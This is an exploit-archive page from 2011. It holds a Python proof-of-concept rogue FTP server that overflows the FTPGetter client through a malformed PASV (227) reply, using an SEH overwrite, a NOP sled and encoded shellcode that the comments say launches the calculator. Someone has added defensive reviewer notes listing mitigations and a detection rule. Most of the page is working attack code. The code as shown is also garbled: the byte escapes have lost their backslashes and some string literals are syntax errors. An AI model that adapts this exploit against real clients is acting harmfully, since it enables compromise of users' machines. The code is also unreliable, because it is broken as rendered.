
FTPGetter 3.58.0.21 Buffer Overflow

Posted on 03 February 2011

#!/usr/bin/python # Exploit Title: FTPGetter v3.58.0.21 Buffer Overflow (PASV) Exploit # Date: 02/03/2011 # Author: modpr0be # Software Link: http://www.ftpgetter.com/ftpgetter_setup.exe # Vulnerable version: <= 3.58.0.21 # Tested on: Windows XP SP3 (VMware Player 3.1.3 build-324285) # CVE : N/A # ====================================================================== # ___ _ __ __ __ _ __ # ____/ (_)___ _(_) /_____ _/ / ___ _____/ /_ (_)___/ /___ ____ _ # / __ / / __ `/ / __/ __ `/ / / _ / ___/ __ / / __ / __ / __ `/ # / /_/ / / /_/ / / /_/ /_/ / / / __/ /__/ / / / / /_/ / / / / /_/ / # \__,_/_/\__, /_/\__/\__,_/_/ \___/\___/_/ /_/_/\__,_/_/ /_/\__,_/ # /____/ http://www.digital-echidna.org # ====================================================================== # # Greetz: # say hello to all digital-echidna org crew: # otoy, cipherstring, bean, s3o, d00m, n0rf0x, fm, gotechidna, manix # special thx: # otoy, cipherstring, cyb3r.anbu, oebaj. # help for documentation: # offsec, exploit-db, corelan-team, 5M7X, loneferret. # #### Software description: # Save time on FTP/SFTP updates! Plan your uploads and automate the workflow. # Schedule and automate file transfers with a centralized console. Let your # computer move or synchronize information securely between home and office # automatically according to the schedule! # #### Exploit information: # There was an error when sending a response to the PASV command. # Fortunately, these errors lead to buffer overflows. # This exploit is unstable. It should only be used as a POC. # I tried several times on various systems, # the buffer sometimes changed. # ### Some Conditions: # This POC is using "the most selling feature" Automated FTP Request. # So this POC, I use Auto Download with / as the Source Files. # Scheduler Settings also set to Repetitive. # Make sure to run the program first before this POC. 
# #### Other information:
# It's a part of "Death of an FTP Client" :)
# For more information, look here:
# http://www.corelan.be:8800/index.php/2010/10/12/death-of-an-ftp-client/
#
# Reviewer notes (defensive summary):
#   This script is a rogue FTP *server*, not a client: it binds port 21,
#   accepts a single connection, answers the client's commands with canned
#   replies (see hajar() below) and finally returns a "227 Entering Passive
#   Mode (...)" reply whose host/port field is the oversized `payload` built
#   here. The header says the client mishandles that reply; presumably it is
#   copied into a fixed-size buffer, which is the overflow being demonstrated.
#   The nseh/seh/nops layout below looks like the classic SEH-record
#   overwrite. Client-side mitigations: validate a 227 reply against the
#   RFC 959 form (six comma-separated decimal octets) before copying it, and
#   build with /SAFESEH, /DYNAMICBASE (ASLR) and DEP so a fixed handler
#   address is not usable. Detection: a 227 reply whose parenthesised list is
#   hundreds of bytes long is never legitimate and is easy to flag in an
#   FTP-aware proxy or IDS.
#   The code is Python 2 (print statements, str payloads).
#   NOTE(review): as rendered on this page the backslashes of the byte
#   escapes are missing, so "x41" is a three-character literal rather than
#   one byte; the sizes the comments assume (485 filler bytes, 223-byte
#   payload, ...) do not hold for the text as shown.
from socket import *
import struct
import time
total = 1000  # target length of the whole 227 host field; junk2 pads up to it
junk1 = "x41" * 485  # filler up to the SEH record (intended: 485 bytes of 0x41)
nseh = "xebx06x90x90"  # next-SEH slot of the overwritten SEH record
seh = struct.pack('<L', 0x1001A149) # ppr from ssleay32.dll
# ^ SEH handler slot: little-endian address of a pop/pop/ret gadget in
#   ssleay32.dll (author's note). A module built with /SAFESEH and ASLR would
#   not provide a stable address here.
nops = "x90" * 8  # NOP sled (intended: eight 0x90 bytes)
# msfpayload windows/exec CMD=calc R | msfencode -t c
# [*] x86/shikata_ga_nai succeeded with size 223 (iteration=1)
# BadChars x00xffx0dx5cx2fx0a
# Benign demonstration payload: per the generator line above it only launches
# the calculator. The bad-character list is why 0x00/0x0d/0x0a/0x2f/0x5c/0xff
# cannot appear inside the 227 reply text.
shellcode = (
"xdbxd1xd9x74x24xf4x5ax31xc9xb1x32xb8xcaxeaxc0"
"x1fx31x42x17x83xc2x04x03x88xf9x22xeaxf0x16x2b"
"x15x08xe7x4cx9fxedxd6x5exfbx66x4ax6fx8fx2ax67"
"x04xddxdexfcx68xcaxd1xb5xc7x2cxdcx46xe6xf0xb2"
"x85x68x8dxc8xd9x4axacx03x2cx8axe9x79xdfxdexa2"
"xf6x72xcfxc7x4ax4fxeex07xc1xefx88x22x15x9bx22"
"x2cx45x34x38x66x7dx3ex66x57x7cx93x74xabx37x98"
"x4fx5fxc6x48x9exa0xf9xb4x4dx9fx36x39x8fxe7xf0"
"xa2xfax13x03x5exfdxe7x7ex84x88xf5xd8x4fx2axde"
"xd9x9cxadx95xd5x69xb9xf2xf9x6cx6ex89x05xe4x91"
"x5ex8cxbexb5x7axd5x65xd7xdbxb3xc8xe8x3cx1bxb4"
"x4cx36x89xa1xf7x15xc7x34x75x20xaex37x85x2bx80"
"x5fxb4xa0x4fx27x49x63x34xd7x03x2ex1cx70xcaxba"
"x1dx1dxedx10x61x18x6ex91x19xdfx6exd0x1cx9bx28"
"x08x6cxb4xdcx2exc3xb5xf4x4cx82x25x94x92")
# Pad the field to `total`. If the pieces already exceed `total` the repeat
# count is negative and Python silently yields "" (no error).
junk2 = "x90" * (total - len(junk1+nseh+seh+nops+shellcode))
payload = junk1+nseh+seh+nops+shellcode+junk2  # full host/port field for the 227 reply
host = "0.0.0.0"  # listen on all interfaces; the client under test is pointed at this machine
port = 21
s = socket(AF_INET, SOCK_STREAM)  # socket/AF_INET/SOCK_STREAM come from the star import above
s.bind((host, port))  # binding port 21 usually needs elevated privileges on Unix-like hosts
s.listen(1)  # single-client PoC: one connection is served, then the script exits
print " [+] FTPGetter v3.58.0.21 Buffer Overflow POC"
print "[+] by modpr0be[at]digital-echidna[dot]org."
print "============================================="
print "[+] Evil FTP Server Started."
print "[+] Listening on %d ..." % port
cl, addr = s.accept()  # blocks until the client connects
print "[+] Connection accepted from %s" % addr[0]
print "[+] Whatever for username and password."
def hajar():
    """Drive the connected client through a canned FTP dialogue, then send the malformed 227 reply.

    Reads the module globals ``cl`` (the accepted client socket) and
    ``payload`` (the oversized host/port field built above).
    Each ``cl.recv(1024)`` only consumes the client's next command; the
    reply is sent regardless of what was received, so the inline comments
    record which command the author expected at that step.
    The final ``227 Entering Passive Mode (...)`` reply is the trigger: its
    parenthesised field is ``payload`` instead of the six decimal octets
    RFC 959 specifies. A hardened client should reject any 227 reply whose
    field does not match ``h1,h2,h3,h4,p1,p2`` before copying it anywhere.
    NOTE(review): as rendered here the replies appear to have lost their
    CRLF terminators, and the two ``257 "/"`` lines have unescaped inner
    quotes (a syntax error as shown); presumably the original used
    single-quoted literals.
    """
    welcome = "220 Welcome to EvilFTP Server "
    cl.send(welcome)
    cl.recv(1024)
    cl.send("331 User name okay, need password ")  # received USER
    cl.recv(1024)
    cl.send("230-Password accepted ")  # received PASS
    cl.send("230 User logged in. ")  # any credentials are accepted
    cl.recv(1024)
    cl.send("215 UNIX Type: L8 ")  # received from SYST
    cl.recv(1024)
    cl.send("200 Type set to I ")  # received from TYPE I
    cl.recv(1024)
    cl.send("200 OK ")  # received from REST 0
    cl.recv(1024)
    cl.send("200 Command not Understood ")  # received from OPTS UTF8 OFF
    cl.recv(1024)
    cl.send("257 "/" is current directory ")  # received from PWD
    cl.recv(1024)
    cl.send("250 CWD Command successful. ")
    cl.recv(1024)
    cl.send("257 "/" is current directory ")  # received from PWD
    cl.recv(1024)
    cl.send("200 Type set to I ")  # received from TYPE I
    cl.recv(1024)
    print "[+] Begin sending evil passive mode.."
    # The trigger: a 227 reply whose host/port field is `payload` (about
    # `total` characters) followed by filler octets, instead of h1,h2,h3,h4,p1,p2.
    cl.send("227 Entering Passive Mode ("+payload+",1,1,1,1,1) ")  # this is the junk from passive mode
    cl.recv(1024)
    cl.close()
hajar()  # serve the one accepted client
time.sleep(3)  # give the client a moment before the listener is torn down
print "[+] Skadush! Calculator will pop out.. "
s.close()

 
